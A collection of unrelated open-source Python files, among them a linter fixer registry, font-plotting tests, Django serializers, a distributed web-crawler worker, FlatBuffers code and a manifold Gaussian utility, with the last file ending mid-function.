|
src/tryceratops/fixers/__init__.py | swellander/tryceratops | 269 | 11155789 | from __future__ import annotations
from typing import TYPE_CHECKING, Set, Type
from .base import BaseFixer
from .exception_block import LoggerErrorFixer, RaiseWithoutCauseFixer, VerboseReraiseFixer
if TYPE_CHECKING:
from tryceratops.filters import GlobalSettings
FIXER_CLASSES: Set[Type[BaseFixer]] = {
RaiseWithoutCauseFixer,
VerboseReraiseFixer,
LoggerErrorFixer,
}
def get_fixers_chain(global_settings: GlobalSettings) -> Set[BaseFixer]:
fixers = {
fixercls() for fixercls in FIXER_CLASSES if global_settings.should_run_processor(fixercls)
}
return fixers
|
tests/proofpdf_test.py | NetaP495L/afdko | 732 | 11155803 | import pytest
from runner import main as runner
from differ import main as differ
from test_utils import get_input_path, get_expected_path, get_temp_file_path
def _get_filename_label(file_name):
sep_index = file_name.find('_')
if sep_index == -1:
return ''
return file_name.split('.')[0][sep_index:]
# -----
# Tests
# -----
@pytest.mark.parametrize('font_filename', [
'cidfont.otf',
'font.otf',
'font.ttf',
])
@pytest.mark.parametrize('tool_name', [
'charplot',
'digiplot',
'fontplot',
'fontplot2',
'hintplot',
'waterfallplot',
])
def test_glyphs_2_7(tool_name, font_filename):
if 'cid' in font_filename:
font_format = 'cid'
elif 'ttf' in font_filename:
font_format = 'ttf'
else:
font_format = 'otf'
pdf_filename = f'{tool_name}_{font_format}_glyphs_2-7.pdf'
font_path = get_input_path(font_filename)
save_path = get_temp_file_path()
runner(['-t', tool_name, '-o', 'o', f'_{save_path}', 'g', '_2-7',
'dno', '=pageIncludeTitle', '_0', '-f', font_path, '-a'])
expected_path = get_expected_path(pdf_filename)
assert differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman'])
@pytest.mark.parametrize('font_filename', [
'cidfont_noHints.otf',
'cidfont_noStems.otf',
'cidfont_noZones.otf',
'font_noHints.otf',
'font_noStems.otf',
'font_noZones.otf',
])
@pytest.mark.parametrize('tool_name', [
'hintplot',
'waterfallplot',
])
def test_hinting_data(tool_name, font_filename):
label = _get_filename_label(font_filename)
if 'cid' in font_filename:
font_format = 'cid'
elif 'ttf' in font_filename:
font_format = 'ttf'
else:
font_format = 'otf'
pdf_filename = f'{tool_name}_{font_format}{label}.pdf'
font_path = get_input_path(font_filename)
save_path = get_temp_file_path()
runner(['-t', tool_name, '-o', 'o', f'_{save_path}', 'g', '_2-7',
'dno', '=pageIncludeTitle', '_0', '-f', font_path, '-a'])
expected_path = get_expected_path(pdf_filename)
assert differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman'])
@pytest.mark.parametrize('font_filename, glyphs', [
('cidfont.otf', '_0-5,98-101'),
('font.otf', '_0-2,4,5'),
])
def test_fontplot2_lf_option(font_filename, glyphs):
tool_name = 'fontplot2'
if 'cid' in font_filename:
font_format = 'cid'
else:
font_format = 'otf'
layout_path = get_input_path('CID_layout')
font_path = get_input_path(font_filename)
pdf_filename = f'{tool_name}_{font_format}_lf_option.pdf'
save_path = get_temp_file_path()
runner(['-t', tool_name, '-o', 'o', f'_{save_path}', 'dno',
'g', glyphs, 'lf', f'_{layout_path}',
'=pageIncludeTitle', '_0', '-f', font_path, '-a'])
expected_path = get_expected_path(pdf_filename)
assert differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman'])
def test_fontsetplot():
f1 = 'SourceSansPro-Black.otf'
f2 = 'SourceSansPro-BlackIt.otf'
pdf_filename = "fontsetplot_otf_glyphs_2-7.pdf"
fp1 = get_input_path(f1)
fp2 = get_input_path(f2)
save_path = get_temp_file_path()
runner(['-t', 'fontsetplot', '-o', 'o', f'_{save_path}', 'dno',
'g', '_2-7', '=pageIncludeTitle', '_0', f'_{fp1}', f'_{fp2}'])
expected_path = get_expected_path(pdf_filename)
assert(differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman']))
@pytest.mark.parametrize('filename', ['SourceSansPro-Black',
'SourceSansPro-BlackIt'])
def test_waterfallplot(filename):
font_filename = f'{filename}.otf'
pdf_filename = f'{filename}.pdf'
font_path = get_input_path(font_filename)
save_path = get_temp_file_path()
expected_path = get_expected_path(pdf_filename)
runner(['-t', 'waterfallplot',
'-o', 'o', f'_{save_path}', 'dno', '-f', font_path, '-a'])
assert differ([expected_path, save_path,
'-s', '/CreationDate',
'-r', r'^BT 1 0 0 1 \d{3}\.\d+ 742\.0000 Tm', # timestamp
'-e', 'macroman'])
@pytest.mark.parametrize('tool_name', [
'charplot',
'digiplot',
'fontplot',
'fontplot2',
'hintplot',
'waterfallplot',
])
def test_seac_in_charstring_bug125(tool_name):
pdf_filename = f'bug125_{tool_name}.pdf'
font_path = get_input_path('seac.otf')
save_path = get_temp_file_path()
runner(['-t', tool_name, '-o', 'o', f'_{save_path}', 'dno',
'=pageIncludeTitle', '_0', '-f', font_path, '-a'])
expected_path = get_expected_path(pdf_filename)
assert differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman'])
@pytest.mark.parametrize('font_format', ['otf', 'ttf'])
def test_round_glyph_bounds_values_bug128(font_format):
bug_numb = 'bug128'
pdf_filename = f'{bug_numb}_{font_format}.pdf'
font_path = get_input_path(f'{bug_numb}/font.{font_format}')
save_path = get_temp_file_path()
runner(['-t', 'charplot', '-o', 'o', f'_{save_path}', 'g', '_o',
'dno', '=pageIncludeTitle', '_0', '-f', font_path, '-a'])
expected_path = get_expected_path(pdf_filename)
assert differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman'])
def test_fontsetplot_ttf_with_components_bug1125():
pdf_filename = "bug1125.pdf"
font_path = get_input_path('bug1125.ttf')
save_path = get_temp_file_path()
runner(['-t', 'fontsetplot', '-o', 'o', f'_{save_path}', 'dno',
'=pageIncludeTitle', '_0', f'_{font_path}'])
expected_path = get_expected_path(pdf_filename)
assert(differ([expected_path, save_path,
'-s', '/CreationDate', '-e', 'macroman']))
|
rllib/rollout.py | mgelbart/ray | 21,382 | 11155808 | <reponame>mgelbart/ray<filename>rllib/rollout.py
#!/usr/bin/env python
from ray.rllib import evaluate
from ray.rllib.evaluate import rollout, RolloutSaver, run
from ray.rllib.utils.deprecation import deprecation_warning
deprecation_warning(old="rllib rollout", new="rllib evaluate", error=False)
# For backward compatibility
rollout = rollout
RolloutSaver = RolloutSaver
run = run
if __name__ == "__main__":
evaluate.main()
|
src/oci/log_analytics/models/label_priority.py | Manny27nyc/oci-python-sdk | 249 | 11155828 | <gh_stars>100-1000
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class LabelPriority(object):
"""
The label priority.
"""
#: A constant which can be used with the priority property of a LabelPriority.
#: This constant has a value of "NONE"
PRIORITY_NONE = "NONE"
#: A constant which can be used with the priority property of a LabelPriority.
#: This constant has a value of "LOW"
PRIORITY_LOW = "LOW"
#: A constant which can be used with the priority property of a LabelPriority.
#: This constant has a value of "MEDIUM"
PRIORITY_MEDIUM = "MEDIUM"
#: A constant which can be used with the priority property of a LabelPriority.
#: This constant has a value of "HIGH"
PRIORITY_HIGH = "HIGH"
def __init__(self, **kwargs):
"""
Initializes a new LabelPriority object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param priority:
The value to assign to the priority property of this LabelPriority.
Allowed values for this property are: "NONE", "LOW", "MEDIUM", "HIGH", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type priority: str
"""
self.swagger_types = {
'priority': 'str'
}
self.attribute_map = {
'priority': 'priority'
}
self._priority = None
@property
def priority(self):
"""
Gets the priority of this LabelPriority.
The label priority. Default value is NONE.
Allowed values for this property are: "NONE", "LOW", "MEDIUM", "HIGH", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The priority of this LabelPriority.
:rtype: str
"""
return self._priority
@priority.setter
def priority(self, priority):
"""
Sets the priority of this LabelPriority.
The label priority. Default value is NONE.
:param priority: The priority of this LabelPriority.
:type: str
"""
allowed_values = ["NONE", "LOW", "MEDIUM", "HIGH"]
if not value_allowed_none_or_none_sentinel(priority, allowed_values):
priority = 'UNKNOWN_ENUM_VALUE'
self._priority = priority
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
scripts/kilt/convert_kilt_100w_passage_tsv_to_jsonl.py | keleog/pyserini | 451 | 11155842 | #
# Pyserini: Reproducible IR research with sparse and dense representations
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import argparse
import pickle
import csv
from tqdm import tqdm
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert KILT 100 words passage tsv into a 100-words Passage-level JSONL that can be processed by Pyserini')
parser.add_argument('--input', required=True, help='Path to the kilt_w100_title.tsv file')
parser.add_argument('--mapping', required=True, help='Path to the mapping_KILT_title.p file')
parser.add_argument('--output-dir', required=True, help='Path to the output directory')
parser.add_argument('--concat-title', action="store_true", default=False, help='Concatenate the title into each paragraph')
args = parser.parse_args()
# Map of title -> wikipedia id
KILT_mapping = pickle.load(open(args.mapping, "rb"))
not_found = set()
with open(args.input, 'r') as f, open(os.path.join(args.output_dir, '100w_passage_kilt_knowledgesource.jsonl'), 'w') as outp:
tsv = csv.reader(f, delimiter="\t")
next(tsv) # Get rid of headers
for row in tqdm(tsv, mininterval=10.0, maxinterval=20.0):
i = row[0]
text = row[1]
title = row[2]
if title not in KILT_mapping:
not_found.add(f"{title}#{i}")
continue
wikipedia_id = str(KILT_mapping[title])
doc = {}
doc["id"] = f"{wikipedia_id}#{i}"
doc["wikipedia_title"] = title
doc["wikipedia_id"] = wikipedia_id
doc["contents"] = f"{title}\n{text}" if args.concat_title else text
_ = outp.write(json.dumps(doc))
_ = outp.write('\n')
print(f"Not found: {not_found}")
|
server/data_common/fbs/NetEncoding/Matrix.py | atong01/cellxgene | 403 | 11155874 | <filename>server/data_common/fbs/NetEncoding/Matrix.py
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: NetEncoding
import flatbuffers
class Matrix(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsMatrix(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = Matrix()
x.Init(buf, n + offset)
return x
# Matrix
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# Matrix
def NRows(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint32Flags, o + self._tab.Pos)
return 0
# Matrix
def NCols(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint32Flags, o + self._tab.Pos)
return 0
# Matrix
def Columns(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
x = self._tab.Vector(o)
x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
x = self._tab.Indirect(x)
from .Column import Column
obj = Column()
obj.Init(self._tab.Bytes, x)
return obj
return None
# Matrix
def ColumnsLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
return self._tab.VectorLen(o)
return 0
# Matrix
def ColIndexType(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint8Flags, o + self._tab.Pos)
return 0
# Matrix
def ColIndex(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
from flatbuffers.table import Table
obj = Table(bytearray(), 0)
self._tab.Union(obj, o)
return obj
return None
# Matrix
def RowIndexType(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint8Flags, o + self._tab.Pos)
return 0
# Matrix
def RowIndex(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(16))
if o != 0:
from flatbuffers.table import Table
obj = Table(bytearray(), 0)
self._tab.Union(obj, o)
return obj
return None
def MatrixStart(builder): builder.StartObject(7)
def MatrixAddNRows(builder, nRows): builder.PrependUint32Slot(0, nRows, 0)
def MatrixAddNCols(builder, nCols): builder.PrependUint32Slot(1, nCols, 0)
def MatrixAddColumns(builder, columns): builder.PrependUOffsetTRelativeSlot(2, flatbuffers.number_types.UOffsetTFlags.py_type(columns), 0)
def MatrixStartColumnsVector(builder, numElems): return builder.StartVector(4, numElems, 4)
def MatrixAddColIndexType(builder, colIndexType): builder.PrependUint8Slot(3, colIndexType, 0)
def MatrixAddColIndex(builder, colIndex): builder.PrependUOffsetTRelativeSlot(4, flatbuffers.number_types.UOffsetTFlags.py_type(colIndex), 0)
def MatrixAddRowIndexType(builder, rowIndexType): builder.PrependUint8Slot(5, rowIndexType, 0)
def MatrixAddRowIndex(builder, rowIndex): builder.PrependUOffsetTRelativeSlot(6, flatbuffers.number_types.UOffsetTFlags.py_type(rowIndex), 0)
def MatrixEnd(builder): return builder.EndObject()
|
tars/api/serializers/base.py | js882829/tars | 371 | 11155884 | <gh_stars>100-1000
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from django.core.validators import ip_address_validators
from django.core.exceptions import ObjectDoesNotExist
from django.utils import timezone
from rest_framework import serializers
from rest_framework.pagination import PaginationSerializer
from rest_framework.serializers import ValidationError
from tars.api.utils import get_paginate_params
class DatetimeTzAwareField(serializers.DateTimeField):
def to_representation(self, value):
value = timezone.localtime(value)
return super(DatetimeTzAwareField, self).to_representation(value)
class PkModelField(serializers.IntegerField):
""" simple field do convertion between a pk and model obj """
def __init__(self, model, **kwargs):
super(PkModelField, self).__init__(**kwargs)
self.model = model
def to_internal_value(self, data):
pk = super(PkModelField, self).to_internal_value(data)
try:
return self.model.objects.get(pk=pk)
except ObjectDoesNotExist as e:
raise serializers.ValidationError(e.message)
def to_representation(self, obj):
return obj.pk
class IPv4AddressField(serializers.CharField):
default_error_messages = {
'invalid': 'Enter a valid IPv4 address.',
}
def __init__(self, **kwargs):
super(IPv4AddressField, self).__init__(**kwargs)
validators, _ = ip_address_validators("ipv4", False)
self.validators.extend(validators)
class DynamicFieldsModelSerializer(serializers.ModelSerializer):
created_at = DatetimeTzAwareField(read_only=True)
updated_at = DatetimeTzAwareField(read_only=True)
def __init__(self, *args, **kwargs):
fields = kwargs.pop('fields', None)
ignored_fields = kwargs.pop('ignored_fields',
getattr(self.Meta, 'ignored_fields', []))
self.fields.pop('DataChange_LastTime', None)
self.fields.pop('is_deleted', None)
super(DynamicFieldsModelSerializer, self).__init__(*args, **kwargs)
if fields is not None:
allowed = set(fields)
existing = set(self.fields.keys())
for field_name in existing - allowed:
self.fields.pop(field_name)
if ignored_fields is not None:
for field in ignored_fields:
self.fields.pop(field, None)
class PaginatedListSerializer(serializers.ListSerializer):
def get_page(self):
request = self.context.get('request')
page, page_size = get_paginate_params(request)
paginator = Paginator(self.instance, page_size)
return paginator.page(page)
def get_paginated_data(self, **kwargs):
try:
page = self.get_page()
except (EmptyPage, PageNotAnInteger) as e:
raise ValidationError(e)
else:
try:
pagination_serializer_class = self.child.__class__.\
get_pagination_serializer_class(**kwargs)
except:
pagination_serializer_class = PaginationSerializer
serializer = pagination_serializer_class(page, context=self.context)
return serializer.data
class PaginatedSerializerMixin(object):
_serializer_cache = {}
@classmethod
def get_pagination_serializer_class(cls, fields=None, ignored_fields=None):
class CustomSerializer(cls):
class Meta:
model = getattr(cls.Meta, 'model')
ignored_fields = getattr(cls.Meta, 'ignored_fields', tuple())
klass = cls
if fields is not None:
setattr(CustomSerializer.Meta, 'fields', fields)
klass = CustomSerializer
if ignored_fields is not None:
setattr(CustomSerializer.Meta, 'ignored_fields', ignored_fields)
klass = CustomSerializer
if klass.__name__ in klass._serializer_cache:
return klass._serializer_cache[klass.__name__]
else:
class SerializerClass(PaginationSerializer):
class Meta:
object_serializer_class = klass
if ignored_fields is None:
klass._serializer_cache[klass.__name__] = SerializerClass
return SerializerClass
@classmethod
def many_init(cls, *args, **kwargs):
if issubclass(cls, DynamicFieldsModelSerializer):
fields = kwargs.pop('fields', None)
ignored_fields = kwargs.pop('ignored_fields', None)
kwargs['child'] = cls(fields=fields, ignored_fields=ignored_fields)
else:
kwargs['child'] = cls()
meta = getattr(cls, 'Meta', None)
list_serializer_class = getattr(meta,
'list_serializer_class',
PaginatedListSerializer)
return list_serializer_class(*args, **kwargs)
class LogSerializer(PaginatedSerializerMixin, serializers.Serializer):
@classmethod
def get_pagination_serializer_class(cls):
return PaginationSerializer
|
ch07/SpiderNode/SpiderWork.py | AaronZhengkk/SpiderBook | 990 | 11155920 | <reponame>AaronZhengkk/SpiderBook
#coding:utf-8
from multiprocessing.managers import BaseManager
from .HtmlDownloader import HtmlDownloader
from .HtmlParser import HtmlParser
class SpiderWork(object):
def __init__(self):
#初始化分布式进程中的工作节点的连接工作
# 实现第一步:使用BaseManager注册获取Queue的方法名称
BaseManager.register('get_task_queue')
BaseManager.register('get_result_queue')
# 实现第二步:连接到服务器:
server_addr = '127.0.0.1'
print(('Connect to server %s...' % server_addr))
# 端口和验证口令注意保持与服务进程设置的完全一致:
self.m = BaseManager(address=(server_addr, 8001), authkey='baike'.encode('utf-8'))
# 从网络连接:
self.m.connect()
# 实现第三步:获取Queue的对象:
self.task = self.m.get_task_queue()
self.result = self.m.get_result_queue()
#初始化网页下载器和解析器
self.downloader = HtmlDownloader()
self.parser = HtmlParser()
print('init finish')
def crawl(self):
while(True):
try:
if not self.task.empty():
url = self.task.get()
if url =='end':
print('控制节点通知爬虫节点停止工作...')
#接着通知其它节点停止工作
self.result.put({'new_urls':'end','data':'end'})
return
print('爬虫节点正在解析:%s'%url.encode('utf-8'))
content = self.downloader.download(url)
new_urls,data = self.parser.parser(url,content)
self.result.put({"new_urls":new_urls,"data":data})
except EOFError as e:
print("连接工作节点失败")
return
except Exception as e:
print(e)
print('Crawl fali ')
if __name__=="__main__":
spider = SpiderWork()
spider.crawl() |
bin/api_connector_splunk/cloudconnectlib/core/template.py | CyberGRX/api-connector-splunk | 106 | 11155948 | from jinja2 import Template
import re
# This pattern matches the template with only one token inside like "{{
# token1}}", "{{ token2 }"
PATTERN = re.compile(r"^\{\{\s*(\w+)\s*\}\}$")
def compile_template(template):
_origin_template = template
_template = Template(template)
def translate_internal(context):
match = re.match(PATTERN, _origin_template)
if match:
context_var = context.get(match.groups()[0])
return context_var if context_var else ''
return _template.render(context)
return translate_internal
|
theseus/optimizer/manifold_gaussian.py | jeffin07/theseus | 236 | 11155951 | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from itertools import count
from typing import List, Optional, Sequence, Tuple
import torch
from theseus.geometry import LieGroup, Manifold
class ManifoldGaussian:
_ids = count(0)
def __init__(
self,
mean: Sequence[Manifold],
precision: Optional[torch.Tensor] = None,
name: Optional[str] = None,
):
self._id = next(ManifoldGaussian._ids)
if name is None:
name = f"{self.__class__.__name__}__{self._id}"
self.name = name
dof = 0
for v in mean:
dof += v.dof()
self._dof = dof
self.mean = mean
if precision is None:
precision = torch.eye(self.dof).to(
dtype=mean[0].dtype, device=mean[0].device
)
precision = precision[None, ...].repeat(mean[0].shape[0], 1, 1)
self.update(mean, precision)
@property
def dof(self) -> int:
return self._dof
@property
def device(self) -> torch.device:
return self.mean[0].device
@property
def dtype(self) -> torch.dtype:
return self.mean[0].dtype
# calls to() on the internal tensors
def to(self, *args, **kwargs):
for var in self.mean:
var = var.to(*args, **kwargs)
self.precision = self.precision.to(*args, **kwargs)
def copy(self, new_name: Optional[str] = None) -> "ManifoldGaussian":
if not new_name:
new_name = f"{self.name}_copy"
mean_copy = [var.copy() for var in self.mean]
precision_copy = self.precision.clone()
return ManifoldGaussian(mean_copy, precision=precision_copy, name=new_name)
def __deepcopy__(self, memo):
if id(self) in memo:
return memo[id(self)]
the_copy = self.copy()
memo[id(self)] = the_copy
return the_copy
def update(
self,
mean: Sequence[Manifold],
precision: torch.Tensor,
):
if len(mean) != len(self.mean):
raise ValueError(
f"Tried to update mean with sequence of different"
f"length to original mean sequence. Given: {len(mean)}. "
f"Expected: {len(self.mean)}"
)
for i in range(len(self.mean)):
self.mean[i].update(mean[i])
expected_shape = torch.Size([mean[0].shape[0], self.dof, self.dof])
if precision.shape != expected_shape:
raise ValueError(
f"Tried to update precision with data "
f"incompatible with original tensor shape. Given: {precision.shape}. "
f"Expected: {expected_shape}"
)
if precision.dtype != self.dtype:
raise ValueError(
f"Tried to update using tensor of dtype: {precision.dtype} but precision "
f"has dtype: {self.dtype}."
)
if precision.device != self.device:
raise ValueError(
f"Tried to update using tensor on device: {precision.dtype} but precision "
f"is on device: {self.device}."
)
if not torch.allclose(precision, precision.transpose(1, 2)):
raise ValueError("Tried to update precision with non-symmetric matrix.")
self.precision = precision
# Projects the gaussian (ManifoldGaussian object) into the tangent plane at
# variable. The gaussian mean is projected using the local function,
# and the precision is approximately transformed using the jacobains of the exp_map.
# Either returns the mean and precision of the new Gaussian in the tangent plane if
# return_mean is True. Otherwise returns the information vector (eta) and precision.
# See section H, eqn 55 in https://arxiv.org/pdf/1812.01537.pdf for a derivation
# of covariance propagation in manifolds.
def local_gaussian(
variable: LieGroup,
gaussian: ManifoldGaussian,
return_mean: bool = True,
) -> Tuple[torch.Tensor, torch.Tensor]:
# assumes gaussian is over just one Manifold object
if len(gaussian.mean) != 1:
raise ValueError(
"local on ManifoldGaussian should be over just one Manifold object. "
f"Passed gaussian {gaussian.name} is over {len(gaussian.mean)} "
"Manifold objects."
)
# check variable and gaussian are of the same LieGroup class
if gaussian.mean[0].__class__ != variable.__class__:
raise ValueError(
"variable and gaussian mean must be instances of the same class. "
f"variable is of class {variable.__class__} and gaussian mean is "
f"of class {gaussian.mean[0].__class__}."
)
# mean vector in the tangent space at variable
mean_tp = variable.local(gaussian.mean[0])
jac: List[torch.Tensor] = []
variable.exp_map(mean_tp, jacobians=jac)
# precision matrix in the tangent space at variable
lam_tp = torch.bmm(torch.bmm(jac[0].transpose(-1, -2), gaussian.precision), jac[0])
if return_mean:
return mean_tp, lam_tp
else:
eta_tp = torch.matmul(lam_tp, mean_tp.unsqueeze(-1)).squeeze(-1)
return eta_tp, lam_tp
# Computes the ManifoldGaussian that corresponds to the gaussian in the tangent plane
# at variable, parameterised by the mean (mean_tp) and precision (precision_tp).
# The mean is transformed to a LieGroup element by retraction.
# The precision is transformed using the inverse of the exp_map jacobians.
# See section H, eqn 55 in https://arxiv.org/pdf/1812.01537.pdf for a derivation
# of covariance propagation in manifolds.
def retract_gaussian(
variable: LieGroup,
mean_tp: torch.Tensor,
precision_tp: torch.Tensor,
) -> ManifoldGaussian:
mean = variable.retract(mean_tp)
jac: List[torch.Tensor] = []
variable.exp_map(mean_tp, jacobians=jac)
inv_jac = torch.inverse(jac[0])
precision = torch.bmm(torch.bmm(inv_jac.transpose(-1, -2), precision_tp), inv_jac)
return ManifoldGaussian(mean=[mean], precision=precision)
|
tests/traces/__init__.py | drewbug/internalblue | 485 | 11155963 | <reponame>drewbug/internalblue
from __future__ import print_function
from __future__ import absolute_import
from tests.traces.testwrapper import trace_test, get_trace_path_cmd_tuple
import unittest
import os
tracedir = os.path.dirname(__file__)
def generate_test_suite_from_traces():
def generate_test_from_file(core, tracefile):
tracepath, cmd = get_trace_path_cmd_tuple(core, tracefile)
def test():
print("Running test %s " % (tracefile[:-6]))
trace_test(core, tracepath, cmd)
# Rename the function to the tracefile name without .trace suffix
test.__name__ = tracefile[:-6]
if cmd:
return test
else:
return unittest.skip("No command specified in trace {}".format(tracepath))(test)
suite = unittest.TestSuite()
for core in os.listdir(tracedir):
if os.path.isdir(os.path.join(tracedir,core)):
core_suite = unittest.TestSuite()
for tracefile in os.listdir(os.path.join(tracedir, core)):
if tracefile.endswith(".trace"):
core_suite.addTest(
unittest.FunctionTestCase(generate_test_from_file(core, tracefile), description=tracefile))
suite.addTest(core_suite)
return suite
# test_all_traces()
def load_tests(loader, standard_tests, n):
"""
This method is called by test frameworks to supply a testsuite instead of the test framework collecting them itself.
This allows use to automatically generate a proper test for each trace in the subdirectory that has a command specified.
Those tests are then run by the framework in the usual way which integrates with IDEs
TODO: Document PyCharm Setup
"""
trace_suite = generate_test_suite_from_traces()
return trace_suite
if __name__ == '__main__':
suite = generate_test_suite_from_traces()
unittest.TextTestRunner().run(suite)
|
acl2020_submission/annotation_tools/tools/construct_input_for_turk.py | yjernite/craftassist | 626 | 11155978 | <gh_stars>100-1000
"""
Copyright (c) Facebook, Inc. and its affiliates.
"""
import argparse
from annotation_tool_1 import MAX_WORDS
def print_csv_format(filename, option_num):
if option_num == 1:
# level 1
print("command", *["word{}".format(i) for i in range(MAX_WORDS)], sep=",")
with open(filename) as f:
for line in f.readlines():
command = line.replace(",", "").strip()
# This is default option for plain text to be rendered.
words = command.split()
print(command, *words, *([""] * (MAX_WORDS - len(words))), sep=",")
elif option_num == 2:
# level 2
print(
"command", "intent", "child", *["word{}".format(i) for i in range(MAX_WORDS)], sep=","
)
with open(filename) as f:
for line in f.readlines():
command = line.replace(",", "").strip()
# This option is if we need highlighted text to be rendered
# file will have : text + "\t" + text with spans in for highlighted words
parts = command.split("\t")
words = parts[0].split()
intent = parts[2]
child = parts[3]
print(parts[1], intent, child, *words, *([""] * (MAX_WORDS - len(words))), sep=",")
elif option_num == 3:
# qualification test
print(
"command_1",
*["word1{}".format(i) for i in range(MAX_WORDS)],
"command_2",
*["word2{}".format(i) for i in range(MAX_WORDS)],
"command_3",
*["word3{}".format(i) for i in range(MAX_WORDS)],
sep=","
)
with open(filename) as f:
l = []
for line in f.readlines():
command = line.replace(",", "").strip()
# This is default option for plain text to be rendered.
words = command.split()
l.append(",".join([command, *words, *([""] * (MAX_WORDS - len(words)))]))
print(",".join(l))
elif option_num == 4:
# composite command tool
print("sentence")
with open(filename) as f:
for line in f.readlines():
line = line.strip()
print(line)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--input_file", type=str, required=True)
parser.add_argument("--tool_num", type=int, default=1)
args = parser.parse_args()
print_csv_format(args.input_file, args.tool_num)
|
autoPyTorch/pipeline/nodes/optimizer_selector.py | mens-artis/Auto-PyTorch | 1,657 | 11155985 | <filename>autoPyTorch/pipeline/nodes/optimizer_selector.py<gh_stars>1000+
__author__ = "<NAME>, <NAME> and <NAME>"
__version__ = "0.0.1"
__license__ = "BSD"
from autoPyTorch.pipeline.base.pipeline_node import PipelineNode
from autoPyTorch.components.optimizer.optimizer import AutoNetOptimizerBase
import torch.nn as nn
import ConfigSpace
import ConfigSpace.hyperparameters as CSH
from autoPyTorch.utils.configspace_wrapper import ConfigWrapper
from autoPyTorch.utils.config.config_option import ConfigOption
class OptimizerSelector(PipelineNode):
def __init__(self):
super(OptimizerSelector, self).__init__()
self.optimizer = dict()
def fit(self, hyperparameter_config, network):
config = ConfigWrapper(self.get_name(), hyperparameter_config)
optimizer_type = self.optimizer[config["optimizer"]]
optimizer_config = ConfigWrapper(config["optimizer"], config)
return {'optimizer': optimizer_type(network.parameters(), optimizer_config)}
def add_optimizer(self, name, optimizer_type):
if (not issubclass(optimizer_type, AutoNetOptimizerBase)):
raise ValueError("optimizer type has to inherit from AutoNetOptimizerBase")
self.optimizer[name] = optimizer_type
def remove_optimizer(self, name):
del self.optimizer[name]
def get_hyperparameter_search_space(self, dataset_info=None, **pipeline_config):
pipeline_config = self.pipeline.get_pipeline_config(**pipeline_config)
cs = ConfigSpace.ConfigurationSpace()
possible_optimizer = set(pipeline_config["optimizer"]).intersection(self.optimizer.keys())
selector = cs.add_hyperparameter(CSH.CategoricalHyperparameter("optimizer", sorted(possible_optimizer)))
for optimizer_name, optimizer_type in self.optimizer.items():
if (optimizer_name not in possible_optimizer):
continue
optimizer_cs = optimizer_type.get_config_space(
**self._get_search_space_updates(prefix=optimizer_name))
cs.add_configuration_space( prefix=optimizer_name, configuration_space=optimizer_cs, delimiter=ConfigWrapper.delimiter,
parent_hyperparameter={'parent': selector, 'value': optimizer_name})
self._check_search_space_updates(possible_optimizer, "*")
return cs
def get_pipeline_config_options(self):
options = [
ConfigOption(name="optimizer", default=list(self.optimizer.keys()), type=str, list=True, choices=list(self.optimizer.keys())),
]
return options
|
python/dgl/backend/tensorflow/sparse_optim.py | ketyi/dgl | 9,516 | 11156002 | <reponame>ketyi/dgl
"""Sparse optimizer is not supported for tensorflow""" |
malaya_speech/utils/aligner.py | huseinzol05/malaya-speech | 111 | 11156023 | import numpy as np
def beta_binomial_prior_distribution(phoneme_count, mel_count, scaling_factor=1.0):
from scipy.stats import betabinom
x = np.arange(0, phoneme_count)
mel_text_probs = []
for i in range(1, mel_count + 1):
a, b = scaling_factor * i, scaling_factor * (mel_count + 1 - i)
